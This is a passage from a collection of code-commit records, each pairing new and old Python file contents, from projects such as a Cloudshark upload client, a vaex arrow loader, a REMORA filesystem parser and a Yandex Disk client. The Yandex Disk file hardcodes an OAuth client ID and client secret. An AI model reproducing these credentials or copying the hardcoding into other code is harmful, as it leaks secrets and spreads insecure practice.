field=models.FileField(null=True, upload_to=b''),
),
]
| Python | 0.000004 |
30452b9fe815a2b68826b739625d1c06886fb17e | Remove redundant isinstance() check | pact/group.py | pact/group.py | import itertools
from .base import PactBase
class PactGroup(PactBase):
def __init__(self, pacts=None, lazy=True):
if pacts is None:
pacts = []
self._pacts = list(pacts)
self._finished_pacts = []
self._is_lazy = lazy
super(PactGroup, self).__init__()
def __iadd__(self, other):
self.add(other)
return self
def __iter__(self):
return itertools.chain(self._pacts, self._finished_pacts)
def add(self, pact, absorb=False):
if absorb and isinstance(pact, PactGroup):
raise NotImplementedError('Absorbing groups is not supported') # pragma: no cover
self._pacts.append(pact)
if absorb:
# pylint: disable=protected-access
while pact._then:
# then might throw, so we attempt it first
self.then(pact._then[0])
pact._then.pop(0)
def _is_finished(self):
has_finished = True
indexes_to_remove = []
for index, pact in enumerate(self._pacts):
if pact.poll():
indexes_to_remove.append(index)
else:
has_finished = False
if self._is_lazy:
break
for index in reversed(indexes_to_remove):
self._finished_pacts.append(self._pacts.pop(index))
return has_finished
def __repr__(self):
return repr(list(self._pacts))
| import itertools
from .base import PactBase
class PactGroup(PactBase):
def __init__(self, pacts=None, lazy=True):
if pacts is None:
pacts = []
self._pacts = list(pacts)
self._finished_pacts = []
self._is_lazy = lazy
super(PactGroup, self).__init__()
def __iadd__(self, other):
self.add(other)
return self
def __iter__(self):
return itertools.chain(self._pacts, self._finished_pacts)
def add(self, pact, absorb=False):
if absorb and isinstance(pact, PactGroup):
if isinstance(pact, PactGroup):
raise NotImplementedError('Absorbing groups is not supported') # pragma: no cover
self._pacts.append(pact)
if absorb:
# pylint: disable=protected-access
while pact._then:
# then might throw, so we attempt it first
self.then(pact._then[0])
pact._then.pop(0)
def _is_finished(self):
has_finished = True
indexes_to_remove = []
for index, pact in enumerate(self._pacts):
if pact.poll():
indexes_to_remove.append(index)
else:
has_finished = False
if self._is_lazy:
break
for index in reversed(indexes_to_remove):
self._finished_pacts.append(self._pacts.pop(index))
return has_finished
def __repr__(self):
return repr(list(self._pacts))
| Python | 0.000015 |
1b3657adf92b52d731fd0d9248f517a0cee58019 | Compute the difference with the previous timestamp | src/remora_parse_fs.py | src/remora_parse_fs.py | #!/usr/bin/env python
#
#========================================================================
# HEADER
#========================================================================
#% DESCRIPTION
#% remora_parse_fs
#%
#% DO NOT call this script directory. This is a postprocessing
#% tool called by REMORA
#%
#========================================================================
#- IMPLEMENTATION
#- version REMORA 1.4
#- authors Carlos Rosales (carlos@tacc.utexas.edu)
#- Antonio Gomez (agomez@tacc.utexas.edu)
#- license MIT
#
#========================================================================
# HISTORY
# 2015/12/15: Doesn't use xltop. Instead, Remora creates a file
# for each node with the filesystem load
# 2015/09/09: Python implementation, handles heterogeneous file
# system entries in xltop.txt correctly
# 2015/08/12: Initial version
#========================================================================
import glob
import sys
from collections import defaultdict
if (len(sys.argv) != 2):
print "Error: invalid number of parameters"
print "This script needs the name of a folder as argument"
sys.exit()
initialized=False
results=defaultdict(list)
header=list()
for filename in glob.iglob(sys.argv[1]+'/lustre_*'):
with open(filename) as f:
idx = 0
for line in f:
idx += 1
if "TIMESTAMP" in line:
#Only process the first line for the firs file that
#is processed
#This is how we collect the different filesystems in
#the sytem
if initialized:
continue
initialized = True
parts = line.split()
for i in parts:
#We don't need the TIMESTAMP name
if "TIMESTAMP" in i:
continue
#Everything that it's not TIMESTAMP in the first
#line of the first file, is a filesystem. We append
#all the filesystems into the header list
header.append(i)
continue
parts = line.split()
idx2=0
#We now process each line. We have to skip the first
#column (the timestamp)
for i in parts:
if (idx2==0):
idx2 += 1
continue
#Now, add or append each value read to the appropriate
#item in a list. 'results' is a dictionary, where the key
#is the name of the filesystem (that's why use 'header[i]'
#to access each element of the dictionary) and the elements
#are lists
if ((idx-2)>=len(results[header[idx2-1]])):
results[header[idx2-1]].append(int(i))
else:
results[header[idx2-1]][idx-2] += int(i)
idx2 += 1
#Now we simply format the matrix for a pretty output
out_header=""
numvals=0
max_load=list()
for i in results:
out_header = out_header + i + " "
numvals=len(results[i])
temp_max=0
for j in xrange(numvals):
if results[i][j] > temp_max:
temp_max = results[i][j]
max_load.append(temp_max)
fout = open(sys.argv[1]+"/fs_lustre_total.txt", "w")
fout.write(out_header+"\n")
for j in xrange(numvals):
out_vals = ""
for i in results:
if (j==0):
out_vals = out_vals + " 0 "
else:
out_vals = out_vals + str(results[i][j]-results[i][j-1]) + " "
fout.write(out_vals +"\n")
fout.close()
idx=0
for i in results:
print "REMORA: MAX load in %10s: %10d" % (i, max_load[idx])
idx += 1
| #!/usr/bin/env python
#
#========================================================================
# HEADER
#========================================================================
#% DESCRIPTION
#% remora_parse_fs
#%
#% DO NOT call this script directory. This is a postprocessing
#% tool called by REMORA
#%
#========================================================================
#- IMPLEMENTATION
#- version REMORA 1.4
#- authors Carlos Rosales (carlos@tacc.utexas.edu)
#- Antonio Gomez (agomez@tacc.utexas.edu)
#- license MIT
#
#========================================================================
# HISTORY
# 2015/12/15: Doesn't use xltop. Instead, Remora creates a file
# for each node with the filesystem load
# 2015/09/09: Python implementation, handles heterogeneous file
# system entries in xltop.txt correctly
# 2015/08/12: Initial version
#========================================================================
import glob
import sys
from collections import defaultdict
if (len(sys.argv) != 2):
print "Error: invalid number of parameters"
print "This script needs the name of a folder as argument"
sys.exit()
initialized=False
results=defaultdict(list)
header=list()
for filename in glob.iglob(sys.argv[1]+'/lustre_*'):
with open(filename) as f:
idx = 0
for line in f:
idx += 1
if "TIMESTAMP" in line:
#Only process the first line for the firs file that
#is processed
#This is how we collect the different filesystems in
#the sytem
if initialized:
continue
initialized = True
parts = line.split()
for i in parts:
#We don't need the TIMESTAMP name
if "TIMESTAMP" in i:
continue
#Everything that it's not TIMESTAMP in the first
#line of the first file, is a filesystem. We append
#all the filesystems into the header list
header.append(i)
continue
parts = line.split()
idx2=0
#We now process each line. We have to skip the first
#column (the timestamp)
for i in parts:
if (idx2==0):
idx2 += 1
continue
#Now, add or append each value read to the appropriate
#item in a list. 'results' is a dictionary, where the key
#is the name of the filesystem (that's why use 'header[i]'
#to access each element of the dictionary) and the elements
#are lists
if ((idx-2)>=len(results[header[idx2-1]])):
results[header[idx2-1]].append(int(i))
else:
results[header[idx2-1]][idx-2] += int(i)
idx2 += 1
#Now we simply format the matrix for a pretty output
out_header=""
numvals=0
max_load=list()
for i in results:
out_header = out_header + i + " "
numvals=len(results[i])
temp_max=0
for j in xrange(numvals):
if results[i][j] > temp_max:
temp_max = results[i][j]
max_load.append(temp_max)
fout = open(sys.argv[1]+"/fs_lustre_total.txt", "w")
fout.write(out_header+"\n")
for j in xrange(numvals):
out_vals = ""
for i in results:
out_vals = out_vals + str(results[i][j]) + " "
fout.write(out_vals +"\n")
fout.close()
idx=0
for i in results:
print "REMORA: MAX load in %10s: %10d" % (i, max_load[idx])
idx += 1
| Python | 1 |
7dc9085bf0665efc3083b64c0b34cb7c8c92ae31 | update now drops duplicates | dblib/dbUpdate.py | dblib/dbUpdate.py | import pymongo
import multiprocessing
import multiprocessing.connection
import time
SIZE = 128
NUM_NODES = 3
def recv_data(sock,dataQueue,cQueue):
connect = sock.accept()
cQueue.put("listen")
data = connect.recv()
dataQueue.put(data)
connect.close()
print("received data")
exit(0)
def db_send(database,queue):
collection = database.times
t = int(time.time())
doc = int(t/600)
for i in range(queue.qsize()):
data = queue.get()
data = data.split(',')
for j in range(0,len(data)-3,4):
new_posts = {}
new_posts.update({'data':{"mac":data[j+3],'node':int(data[0]),'time':int(data[j+1]),'sigstr':int(data[j+2])}})
collection.update({'_id':doc},{"$addToSet":new_posts},upsert=True)
## dic = {'node':temp[0],'time':temp[1],'sigstr':temp[2],'mac':temp[3]}
## new_posts.append(dic)
## posts.insert_many(new_posts)
print("sent")
exit(0)
def server(host,port):
client = pymongo.MongoClient()
db = client.cheddar
sock = multiprocessing.connection.Listener((host,port))
dq = multiprocessing.Queue()
cq = multiprocessing.Queue()
cq.put("listen")
while True:
try:
task = cq.get(True,1)
except:
task = "none"
if task == "listen":
print("spawning listening thread")
p = multiprocessing.Process(target=recv_data, args=(sock,dq,cq))
p.start()
## if (dq.qsize() == 100):
if dq.qsize() != 0:
print("spawning sending thread")
p = multiprocessing.Process(target=db_send,args=(db,dq))
p.start()
## pass
server('',10000)
| import pymongo
import multiprocessing
import multiprocessing.connection
import time
SIZE = 128
NUM_NODES = 3
def recv_data(sock,dataQueue,cQueue):
connect = sock.accept()
cQueue.put("listen")
data = connect.recv()
dataQueue.put(data)
connect.close()
print("received data")
exit(0)
def db_send(database,queue):
collection = database.times
t = int(time.time())
doc = int(t/600)
for i in range(queue.qsize()):
data = queue.get()
data = data.split(',')
for j in range(0,len(data)-3,4):
new_posts = {}
new_posts.update({'data':{"mac":data[j+3],'node':int(data[0]),'time':int(data[j+1]),'sigstr':int(data[j+2])}})
collection.update({'_id':doc},{"$push":new_posts},upsert=True)
## dic = {'node':temp[0],'time':temp[1],'sigstr':temp[2],'mac':temp[3]}
## new_posts.append(dic)
## posts.insert_many(new_posts)
print("sent")
exit(0)
def server(host,port):
client = pymongo.MongoClient()
db = client.cheddar
sock = multiprocessing.connection.Listener((host,port))
dq = multiprocessing.Queue()
cq = multiprocessing.Queue()
cq.put("listen")
while True:
try:
task = cq.get(True,1)
except:
task = "none"
if task == "listen":
print("spawning listening thread")
p = multiprocessing.Process(target=recv_data, args=(sock,dq,cq))
p.start()
## if (dq.qsize() == 100):
if dq.qsize() != 0:
print("spawning sending thread")
p = multiprocessing.Process(target=db_send,args=(db,dq))
p.start()
## pass
server('',10000)
| Python | 0 |
e76d6ad7a4670bfa47ba506343aff2e5f118f976 | fix rsync options for use in shared scenarios | myriadeploy/update_myria_jar_only.py | myriadeploy/update_myria_jar_only.py | #!/usr/bin/env python
import myriadeploy
import subprocess
import sys
def host_port_list(workers):
return [str(worker[0]) + ':' + str(worker[1]) for worker in workers]
def get_host_port_path(node, default_path):
if len(node) == 2:
(hostname, port) = node
if default_path is None:
raise Exception("Path not specified for node %s" % str(node))
else:
path = default_path
else:
(hostname, port, path) = node
return (hostname, port, path)
def copy_distribution(config):
"Copy the distribution (jar and libs and conf) to compute nodes."
nodes = config['nodes']
description = config['description']
default_path = config['path']
username = config['username']
for node in nodes:
(hostname, _, path) = get_host_port_path(node, default_path)
if hostname != 'localhost':
remote_path = "%s@%s:%s/%s-files" % (username, hostname, path, description)
else:
remote_path = "%s/%s-files" % (path, description)
to_copy = ["libs", "conf"]
args = ["rsync", "--del", "-rlDLvz"] + to_copy + [remote_path]
if subprocess.call(args):
raise Exception("Error copying distribution to %s" % (hostname,))
def main(argv):
# Usage
if len(argv) != 2:
print >> sys.stderr, "Usage: %s <deployment.cfg>" % (argv[0])
print >> sys.stderr, " deployment.cfg: a configuration file modeled after deployment.cfg.sample"
sys.exit(1)
config = myriadeploy.read_config_file(argv[1])
# Step 1: Copy over libs, "conf", myria
copy_distribution(config)
if __name__ == "__main__":
main(sys.argv)
| #!/usr/bin/env python
import myriadeploy
import subprocess
import sys
def host_port_list(workers):
return [str(worker[0]) + ':' + str(worker[1]) for worker in workers]
def get_host_port_path(node, default_path):
if len(node) == 2:
(hostname, port) = node
if default_path is None:
raise Exception("Path not specified for node %s" % str(node))
else:
path = default_path
else:
(hostname, port, path) = node
return (hostname, port, path)
def copy_distribution(config):
"Copy the distribution (jar and libs and conf) to compute nodes."
nodes = config['nodes']
description = config['description']
default_path = config['path']
username = config['username']
for node in nodes:
(hostname, _, path) = get_host_port_path(node, default_path)
if hostname != 'localhost':
remote_path = "%s@%s:%s/%s-files" % (username, hostname, path, description)
else:
remote_path = "%s/%s-files" % (path, description)
to_copy = ["libs", "conf"]
args = ["rsync", "--del", "-aLvz"] + to_copy + [remote_path]
if subprocess.call(args):
raise Exception("Error copying distribution to %s" % (hostname,))
def main(argv):
# Usage
if len(argv) != 2:
print >> sys.stderr, "Usage: %s <deployment.cfg>" % (argv[0])
print >> sys.stderr, " deployment.cfg: a configuration file modeled after deployment.cfg.sample"
sys.exit(1)
config = myriadeploy.read_config_file(argv[1])
# Step 1: Copy over libs, "conf", myria
copy_distribution(config)
if __name__ == "__main__":
main(sys.argv)
| Python | 0 |
afbef65bd28f0058edf39579125e2ccb35a72aee | Update test_multivariate.py to Python 3.4 | nb_twitter/test/test_multivariate.py | nb_twitter/test/test_multivariate.py | # -*- coding: utf-8 -*-
# test_multivariate.py
# nb_twitter/nb_twitter/bayes
#
# Created by Thomas Nelson <tn90ca@gmail.com>
# Preston Engstrom <pe12nh@brocku.ca>
# Created..........................2015-06-29
# Modified.........................2015-06-30
#
# This script was developed for use as part of the nb_twitter package
from nb_twitter.bayes import multivariate
train_class = ['c', 'j']
train_docs = [['c', 'chinese beijing chinese'],
['c', 'chinese chinese shanghai'],
['c', 'chinese macao'],
['j', 'tokyo japan chinese']]
test_docs = 'chinese chinese chinese tokyo japan'
classifier = multivariate.Multivariate(train_class, train_docs)
classifier.train()
results = classifier.run(test_docs)
print("C\t\t=", classifier.C)
print("D\t\t=", classifier.D)
print("N\t\t=", classifier.N)
print("V\t\t=", classifier.V)
print("Nc\t\t=", classifier.Nc)
print("Prior\t=", classifier.prior)
print("Prob\t=", classifier.prob)
print
print(results)
| # -*- coding: utf-8 -*-
# test_multivariate.py
# nb_twitter/nb_twitter/bayes
#
# Created by Thomas Nelson <tn90ca@gmail.com>
# Preston Engstrom <pe12nh@brocku.ca>
# Created..........................2015-06-29
# Modified.........................2015-06-29
#
# This script was developed for use as part of the nb_twitter package
from nb_twitter.bayes import multivariate
train_class = ['c', 'j']
train_docs = [['c', 'chinese beijing chinese'],
['c', 'chinese chinese shanghai'],
['c', 'chinese macao'],
['j', 'tokyo japan chinese']]
test_docs = 'chinese chinese chinese tokyo japan'
classifier = multivariate.Multivariate(train_class, train_docs)
classifier.train()
results = classifier.run(test_docs)
print "C\t\t=", classifier.C
print "D\t\t=", classifier.D
print "N\t\t=", classifier.N
print "V\t\t=", classifier.V
print "Nc\t\t=", classifier.Nc
print "Prior\t=", classifier.prior
print "Prob\t=", classifier.prob
print
print(results) | Python | 0.000009 |
45b0af75824c1f7715c464ae2dfc35ac8d7a9767 | Add additional_tags parameter to upload and pass through client args to httplib2. | cloudshark/cloudshark.py | cloudshark/cloudshark.py |
import httplib2
import io
import json
import os
import urllib
class CloudsharkError(Exception):
def __init__(self, msg, error_code=None):
self.msg = msg
self.error_code = error_code
def __str__(self):
return repr('%s: %s' % (self.error_code, self.msg))
class Cloudshark(object):
def __init__(self,url,token,client_args={}):
self.url = url
self.token = token
self.client_args = client_args
def get_info(self,id):
"""Get the info about a particular capture by id."""
url = '%s/api/v1/%s/info/%s' % (self.url,self.token,id)
http = httplib2.Http(**self.client_args)
(response,content) = http.request(url,method='GET')
http_status = response.get('status')
if http_status != '200':
print(response)
raise CloudsharkError('Error retrieving: %s'%url,http_status)
return json.loads(content)
def search_by_file_name(self,file_name):
"""Search for a capture by file name."""
url = '%s/api/v1/%s/search?search[filename]=%s' % (self.url,self.token,urllib.quote(file_name))
http = httplib2.Http(**self.client_args)
(response,content) = http.request(url,method='GET')
http_status = response.get('status')
if http_status != '200':
print(response)
raise CloudsharkError('Error retrieving: %s'%url,http_status)
return json.loads(content)
def upload(self,file_object,file_name=None,additional_tags=None,comments=None):
"""Upload a capture file to Cloudshark."""
url = '%s/api/v1/%s/upload' % (self.url,self.token)
BOUNDARY = "LANDSHARKCLOUDSHARK"
headers = {}
headers['Content-Type'] = 'multipart/form-data; boundary=%s' % BOUNDARY
if file_name is None:
file_name = os.path.basename(file_object.name)
file_content = file_object.read()
body_lines = ['--' + BOUNDARY,
'Content-Disposition: form-data; name="file"; filename="%s"' % file_name,
'Content-Type: application/octet-stream',
'',
file_content]
if additional_tags is not None:
body_lines += ['--' + BOUNDARY,
'Content-Disposition: form-data; name="additional_tags"',
'Content-Type: text/plain',
'',
','.join(additional_tags)]
if comments is not None:
body_lines += ['--' + BOUNDARY,
'Content-Disposition: form-data; name="comments"',
'Content-Type: text/plain',
'',
comments]
body_lines += ['--' + BOUNDARY + '--',
'']
b = io.BytesIO()
for body_line in body_lines:
if isinstance(body_line,unicode):
b.write(body_line.encode('utf-8'))
else:
b.write(body_line)
b.write(b'\r\n')
body = b.getvalue()
http = httplib2.Http(**self.client_args)
(response,content) = http.request(url,method='POST',body=body,headers=headers)
http_status = response.get('status')
if http_status != '200':
print(response)
raise CloudsharkError('Error retrieving: %s'%url,http_status)
# content is a dict with "id" and "filename" entries.
return json.loads(content)
|
import httplib2
import io
import json
import os
import urllib
class CloudsharkError(Exception):
def __init__(self, msg, error_code=None):
self.msg = msg
self.error_code = error_code
def __str__(self):
return repr('%s: %s' % (self.error_code, self.msg))
class Cloudshark(object):
def __init__(self,url,token):
self.url = url
self.token = token
def get_info(self,id):
"""Get the info about a particular capture by id."""
url = '%s/api/v1/%s/info/%s' % (self.url,self.token,id)
http = httplib2.Http()
(response,content) = http.request(url,method='GET')
http_status = response.get('status')
if http_status != '200':
print(response)
raise CloudsharkError('Error retrieving: %s'%url,http_status)
return json.loads(content)
def search_by_file_name(self,file_name):
"""Search for a capture by file name."""
url = '%s/api/v1/%s/search?search[filename]=%s' % (self.url,self.token,urllib.quote(file_name))
http = httplib2.Http()
(response,content) = http.request(url,method='GET')
http_status = response.get('status')
if http_status != '200':
print(response)
raise CloudsharkError('Error retrieving: %s'%url,http_status)
return json.loads(content)
def upload(self,file_object,file_name=None):
"""Upload a capture file to Cloudshark."""
url = '%s/api/v1/%s/upload' % (self.url,self.token)
BOUNDARY = "LANDSHARKCLOUDSHARK"
headers = {}
headers['Content-Type'] = 'multipart/form-data; boundary=%s' % BOUNDARY
if file_name is None:
file_name = os.path.basename(file_object.name)
file_content = file_object.read()
body_lines = ['--' + BOUNDARY,
'Content-Disposition: form-data; name="file"; filename="%s"' % file_name,
'Content-Type: application/octet-stream',
'',
file_content,
'--' + BOUNDARY + '--',
'']
b = io.BytesIO()
for body_line in body_lines:
if isinstance(body_line,unicode):
b.write(body_line.encode('utf-8'))
else:
b.write(body_line)
b.write(b'\r\n')
body = b.getvalue()
http = httplib2.Http()
(response,content) = http.request(url,method='POST',body=body,headers=headers)
http_status = response.get('status')
if http_status != '200':
print(response)
raise CloudsharkError('Error retrieving: %s'%url,http_status)
# content is a dict with "id" and "filename" entries.
return json.loads(content)
| Python | 0 |
1b668fa59624bc1f73f5fceebecbbadfc0038156 | support arrow DictionaryType | packages/vaex-arrow/vaex_arrow/dataset.py | packages/vaex-arrow/vaex_arrow/dataset.py | __author__ = 'maartenbreddels'
import logging
import pyarrow as pa
import pyarrow.parquet as pq
import vaex.dataset
import vaex.file.other
from .convert import column_from_arrow_array
logger = logging.getLogger("vaex_arrow")
class DatasetArrow(vaex.dataset.DatasetLocal):
"""Implements storage using arrow"""
def __init__(self, filename=None, table=None, write=False):
super(DatasetArrow, self).__init__(name=filename, path=filename, column_names=[])
self._write = write
if table is None:
self._load()
else:
self._load_table(table)
def _load(self):
source = pa.memory_map(self.path)
reader = pa.ipc.open_stream(source)
table = pa.Table.from_batches([b for b in reader])
self._load_table(table)
def _load_table(self, table):
self._length_unfiltered = self._length_original = table.num_rows
self._index_end = self._length_original = table.num_rows
for col in table.columns:
name = col.name
# TODO: keep the arrow columns, and support and test chunks
arrow_array = col.data.chunks[0]
if isinstance(arrow_array.type, pa.DictionaryType):
column = column_from_arrow_array(arrow_array.indices)
labels = column_from_arrow_array(arrow_array.dictionary).tolist()
self._categories[name] = dict(labels=labels, N=len(labels))
else:
column = column_from_arrow_array(arrow_array)
self.columns[name] = column
self.column_names.append(name)
self._save_assign_expression(name, vaex.expression.Expression(self, name))
@classmethod
def can_open(cls, path, *args, **kwargs):
return path.rpartition('.')[2] == 'arrow'
@classmethod
def get_options(cls, path):
return []
@classmethod
def option_to_args(cls, option):
return []
class DatasetParquet(DatasetArrow):
def _load(self):
# might not be optimal, but it works, we can always see if we can
# do mmapping later on
table = pq.read_table(self.path)
self._load_table(table)
vaex.file.other.dataset_type_map["arrow"] = DatasetArrow
vaex.file.other.dataset_type_map["parquet"] = DatasetParquet
| __author__ = 'maartenbreddels'
import logging
import pyarrow as pa
import pyarrow.parquet as pq
import vaex.dataset
import vaex.file.other
from .convert import column_from_arrow_array
logger = logging.getLogger("vaex_arrow")
class DatasetArrow(vaex.dataset.DatasetLocal):
"""Implements storage using arrow"""
def __init__(self, filename=None, table=None, write=False):
super(DatasetArrow, self).__init__(name=filename, path=filename, column_names=[])
self._write = write
if table is None:
self._load()
else:
self._load_table(table)
def _load(self):
source = pa.memory_map(self.path)
reader = pa.ipc.open_stream(source)
table = pa.Table.from_batches([b for b in reader])
self._load_table(table)
def _load_table(self, table):
self._length_unfiltered = self._length_original = table.num_rows
self._index_end = self._length_original = table.num_rows
for col in table.columns:
name = col.name
# TODO: keep the arrow columns, and support and test chunks
arrow_array = col.data.chunks[0]
column = column_from_arrow_array(arrow_array)
self.columns[name] = column
self.column_names.append(name)
self._save_assign_expression(name, vaex.expression.Expression(self, name))
@classmethod
def can_open(cls, path, *args, **kwargs):
return path.rpartition('.')[2] == 'arrow'
@classmethod
def get_options(cls, path):
return []
@classmethod
def option_to_args(cls, option):
return []
class DatasetParquet(DatasetArrow):
def _load(self):
# might not be optimal, but it works, we can always see if we can
# do mmapping later on
table = pq.read_table(self.path)
self._load_table(table)
vaex.file.other.dataset_type_map["arrow"] = DatasetArrow
vaex.file.other.dataset_type_map["parquet"] = DatasetParquet
| Python | 0 |
52239a9b6cd017127d52c29ac0e2a0d3818e7d9e | Add new lab_members fieldset_website to fieldsets for cms_lab_members | cms_lab_members/admin.py | cms_lab_members/admin.py | from django.contrib import admin
from cms.admin.placeholderadmin import PlaceholderAdminMixin
from lab_members.models import Scientist
from lab_members.admin import ScientistAdmin
class CMSScientistAdmin(PlaceholderAdminMixin, ScientistAdmin):
fieldsets = [
ScientistAdmin.fieldset_basic,
ScientistAdmin.fieldset_website,
ScientistAdmin.fieldset_advanced,
]
admin.site.unregister(Scientist)
admin.site.register(Scientist, CMSScientistAdmin)
| from django.contrib import admin
from cms.admin.placeholderadmin import PlaceholderAdminMixin
from lab_members.models import Scientist
from lab_members.admin import ScientistAdmin
class CMSScientistAdmin(PlaceholderAdminMixin, ScientistAdmin):
fieldsets = [
ScientistAdmin.fieldset_basic,
ScientistAdmin.fieldset_advanced,
]
admin.site.unregister(Scientist)
admin.site.register(Scientist, CMSScientistAdmin)
| Python | 0 |
dda3ebfcb9fff7f7304ee72c087dca9f8556fe6c | Update yadisk.py | cogs/utils/api/yadisk.py | cogs/utils/api/yadisk.py | import json
import requests
DEVICE_ID = '141f72b7-fd02-11e5-981a-00155d860f42'
DEVICE_NAME = 'DroiTaka'
CLIENT_ID = 'b12710fc26ee46ba82e34b97f08f2305'
CLIENT_SECRET = '4ff2284115644e04acc77c54526364d2'
class YaDisk(object):
def __init__(self, token):
self.session = requests.session()
self.session.headers.update({'Authentication': 'OAuth ' + str(token),})
def get_key_url():
format_url = "https://oauth.yandex.ru/authorize?response_type=code&client_id={}&device_id={}&device_name={}&force_confirm=yes"
return format_url.format(CLIENT_ID, DEVICE_ID, DEVICE_NAME)
def get_token(key):
res = requests.post('https://oauth.yandex.ru/token', data = {
'grant_type': 'authorization_code',
'code': key,
'client_id': CLIENT_ID,
'client_secret': CLIENT_SECRET,
'device_id': DEVICE_ID,
'device_name': DEVICE_NAME,
})
print(res.text)
return res.json()['access_token']
def _get(self, url, *args, **kwargs):
return self.session.get(url, *args, **kwargs)
def _post(self, url, data, *args, **kwargs):
return self.session.post(url, {'data': json.dumps(data), }, *args, **kwargs)
def list_files(self, dir_path):
file_list = []
res = self._get("https://cloud-api.yandex.net:443/v1/disk/resources", params={"path": dir_path,})
for file in res.json()['_embedded']['items']:
if file['type'] == 'file':
file_list.append(file['name'])
return file_list
def direct_link(self, file_path):
response = self.session._get("https://cloud-api.yandex.net:443/v1/disk/resources/download",
params={"path": file_path,})
return response.json()['href']
| import json
import requests
DEVICE_ID = '141f72b7-fd02-11e5-981a-00155d860f42'
DEVICE_NAME = 'DroiTaka'
CLIENT_ID = 'b12710fc26ee46ba82e34b97f08f2305'
CLIENT_SECRET = '4ff2284115644e04acc77c54526364d2'
class YaDisk(object):
def __init__(self, token):
self.session = requests.session()
self.session.headers.update({'Authentication': 'OAuth ' + str(token),})
def get_key_url():
format_url = "https://oauth.yandex.ru/authorize?response_type=code&client_id={}&device_id={}&device_name={}&force_confirm=yes"
return format_url.format(CLIENT_ID, DEVICE_ID, DEVICE_NAME)
def get_token(key):
res = requests.post('http://oauth.yandex.ru/token', data = {
'grant_type': 'authorization_code',
'code': key,
'client_id': CLIENT_ID,
'client_secret': CLIENT_SECRET,
'device_id': DEVICE_ID,
'device_name': DEVICE_NAME,
})
print(res.text)
return res.json()['access_token']
def _get(self, url, *args, **kwargs):
return self.session.get(url, *args, **kwargs)
def _post(self, url, data, *args, **kwargs):
return self.session.post(url, {'data': json.dumps(data), }, *args, **kwargs)
def list_files(self, dir_path):
file_list = []
res = self._get("https://cloud-api.yandex.net:443/v1/disk/resources", params={"path": dir_path,})
for file in res.json()['_embedded']['items']:
if file['type'] == 'file':
file_list.append(file['name'])
return file_list
def direct_link(self, file_path):
response = self.session._get("https://cloud-api.yandex.net:443/v1/disk/resources/download",
params={"path": file_path,})
return response.json()['href']
| Python | 0.000001 |
2eb1535c3bb137216548bacaf9f7a22cd9e0e8a2 | Fix incorrect double-quotes. | colour/plotting/graph.py | colour/plotting/graph.py | # -*- coding: utf-8 -*-
"""
Automatic Colour Conversion Graph Plotting
==========================================
Defines the automatic colour conversion graph plotting objects:
- :func:`colour.plotting.plot_automatic_colour_conversion_graph`
"""
from __future__ import division
from colour.graph import CONVERSION_GRAPH, CONVERSION_GRAPH_NODE_LABELS
from colour.utilities import is_networkx_installed
if is_networkx_installed(): # pragma: no cover
import networkx as nx
__author__ = 'Colour Developers'
__copyright__ = 'Copyright (C) 2013-2020 - Colour Developers'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'Colour Developers'
__email__ = 'colour-developers@colour-science.org'
__status__ = 'Production'
__all__ = ['plot_automatic_colour_conversion_graph']
def plot_automatic_colour_conversion_graph(filename, prog='fdp', args=''):
"""
Plots *Colour* automatic colour conversion graph using
`Graphviz <https://www.graphviz.org/>`__ and
`pyraphviz <https://pygraphviz.github.io>`__.
Parameters
----------
filename : unicode
Filename to use to save the image.
prog : unicode, optional
{'neato', 'dot', 'twopi', 'circo', 'fdp', 'nop'},
*Graphviz* layout method.
args : unicode, optional
Additional arguments for *Graphviz*.
Returns
-------
AGraph
*Pyraphviz* graph.
Notes
-----
- This definition does not directly plot the *Colour* automatic colour
conversion graph but instead write it to an image.
Examples
--------
>>> import tempfile
>>> import colour
>>> from colour import read_image
>>> from colour.plotting import plot_image
>>> filename = '{0}.png'.format(tempfile.mkstemp()[-1])
>>> _ = plot_automatic_colour_conversion_graph(filename, 'dot')
... # doctest: +SKIP
>>> plot_image(read_image(filename)) # doctest: +SKIP
.. image:: ../_static/Plotting_Plot_Colour_Automatic_Conversion_Graph.png
:align: center
:alt: plot_automatic_colour_conversion_graph
"""
if is_networkx_installed(raise_exception=True): # pragma: no cover
agraph = nx.nx_agraph.to_agraph(CONVERSION_GRAPH)
for node in agraph.nodes():
node.attr.update(label=CONVERSION_GRAPH_NODE_LABELS[node.name])
agraph.node_attr.update(
style='filled',
shape='circle',
color='#2196F3FF',
fillcolor='#2196F370',
fontname='Helvetica',
fontcolor='#263238')
agraph.edge_attr.update(color='#26323870')
for node in ('CIE XYZ', 'RGB', 'Spectral Distribution'):
agraph.get_node(node.lower()).attr.update(
shape='doublecircle',
color='#673AB7FF',
fillcolor='#673AB770',
fontsize=30)
for node in ('ATD95', 'CAM16', 'CIECAM02', 'Hunt', 'LLAB',
'Nayatani95', 'RLAB'):
agraph.get_node(node.lower()).attr.update(
color='#00BCD4FF', fillcolor='#00BCD470')
agraph.draw(filename, prog=prog, args=args)
return agraph
| # -*- coding: utf-8 -*-
"""
Automatic Colour Conversion Graph Plotting
==========================================
Defines the automatic colour conversion graph plotting objects:
- :func:`colour.plotting.plot_automatic_colour_conversion_graph`
"""
from __future__ import division
from colour.graph import CONVERSION_GRAPH, CONVERSION_GRAPH_NODE_LABELS
from colour.utilities import is_networkx_installed
if is_networkx_installed(): # pragma: no cover
import networkx as nx
__author__ = 'Colour Developers'
__copyright__ = 'Copyright (C) 2013-2020 - Colour Developers'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'Colour Developers'
__email__ = 'colour-developers@colour-science.org'
__status__ = 'Production'
__all__ = ['plot_automatic_colour_conversion_graph']
def plot_automatic_colour_conversion_graph(filename, prog='fdp', args=''):
"""
Plots *Colour* automatic colour conversion graph using
`Graphviz <https://www.graphviz.org/>`__ and
`pyraphviz <https://pygraphviz.github.io>`__.
Parameters
----------
filename : unicode
Filename to use to save the image.
prog : unicode, optional
{'neato', 'dot', 'twopi', 'circo', 'fdp', 'nop'},
*Graphviz* layout method.
args : unicode, optional
Additional arguments for *Graphviz*.
Returns
-------
AGraph
*Pyraphviz* graph.
Notes
-----
- This definition does not directly plot the *Colour* automatic colour
conversion graph but instead write it to an image.
Examples
--------
>>> import tempfile
>>> import colour
>>> from colour import read_image
>>> from colour.plotting import plot_image
>>> filename = '{0}.png'.format(tempfile.mkstemp()[-1])
>>> _ = plot_automatic_colour_conversion_graph(filename, 'dot')
... # doctest: +SKIP
>>> plot_image(read_image(filename)) # doctest: +SKIP
